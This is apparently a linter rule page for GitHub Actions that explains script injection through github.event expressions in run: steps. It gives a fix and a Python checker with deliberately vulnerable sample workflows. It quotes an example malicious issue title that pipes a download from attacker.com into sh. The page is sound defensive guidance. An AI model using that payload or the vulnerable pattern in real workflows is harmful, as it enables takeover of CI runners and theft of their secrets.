GA-C005: Script injection risk
Severity: Warning | Category: Security
Why This Matters
Directly interpolating user-controlled GitHub context expressions such as `${{ github.event.issue.title }}` into `run:` blocks allows script injection: the expression is expanded into the script text before the shell parses it. An attacker can craft an issue title containing shell metacharacters (e.g., `"; curl attacker.com/steal | sh #`) to execute arbitrary commands on the workflow runner.
How to Fix
Assign the context value to an environment variable first, then reference the variable from the script. The runner passes the value to the shell as data rather than splicing it into the script text, so metacharacters in it are never parsed as code. Keep the variable double-quoted so the shell does not word-split or glob its contents.
Before (incorrect)

  run: echo "${{ github.event.issue.title }}"

After (correct)

  env:
    TITLE: ${{ github.event.issue.title }}
  run: echo "$TITLE"

Rule Details
- Rule Code: GA-C005
- Severity: Warning
- Category: Security
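A minimal checker for the pattern this rule describes, added here as an illustration and not the linter's own implementation. It scans workflow text line by line for `${{ ... }}` expressions written directly into `run:` steps (inline values and `|`/`>` block scalars) and reports those rooted at `github.event.`; treating every `github.event.*` field as attacker-controlled is an assumption of this example, and the two sample workflows are constructed.

```python
import re

# Assumption (not stated by the rule page): any expression rooted at github.event.*
# is treated as potentially attacker-controlled; extend the tuple for other contexts.
USER_CONTROLLED_PREFIXES = ("github.event.",)
EXPR_RE = re.compile(r"\$\{\{\s*(.*?)\s*\}\}")
RUN_KEY_RE = re.compile(r"(-\s+)?run:\s*(.*)$")
BLOCK_INDICATORS = ("|", ">", "|-", ">-", "|+", ">+")

def _scan(lineno, text):
    # Flag each user-controlled ${{ }} expression on one line of a run: script.
    return [(lineno, m.group(1)) for m in EXPR_RE.finditer(text)
            if m.group(1).startswith(USER_CONTROLLED_PREFIXES)]

def find_run_injections(workflow_text):
    # Return (line_number, expression) for every flagged expression written
    # directly into a run: step. Line-based, so no YAML parser is required.
    findings = []
    in_block, key_indent = False, 0
    for lineno, line in enumerate(workflow_text.splitlines(), start=1):
        stripped = line.lstrip()
        indent = len(line) - len(stripped)
        # Inside a block scalar, every deeper-indented (or blank) line is script.
        if in_block and (not stripped or indent > key_indent):
            findings.extend(_scan(lineno, line))
            continue
        in_block = False  # a dedent ends the block scalar
        m = RUN_KEY_RE.match(stripped)
        if not m:
            continue
        if m.group(2).strip() in BLOCK_INDICATORS:
            # `run: |` starts a block; remember the indent of the run: key itself.
            in_block, key_indent = True, indent + len(m.group(1) or "")
        else:
            findings.extend(_scan(lineno, m.group(2)))  # inline run: value
    return findings

# Constructed sample step lists, not taken from the rule page.
VULNERABLE = """\
steps:
  - run: echo "${{ github.event.issue.title }}"
  - name: Multi-line step
    run: |
      echo "Opened by ${{ github.event.issue.user.login }}"
      echo "commit ${{ github.sha }}"  # not in the flagged prefix list
"""
FIXED = """\
steps:
  - env:
      TITLE: ${{ github.event.issue.title }}
    run: echo "$TITLE"
"""
```

`find_run_injections(VULNERABLE)` reports lines 2 and 5, while the `env:` form in `FIXED` produces no findings because the expression is no longer part of the script text.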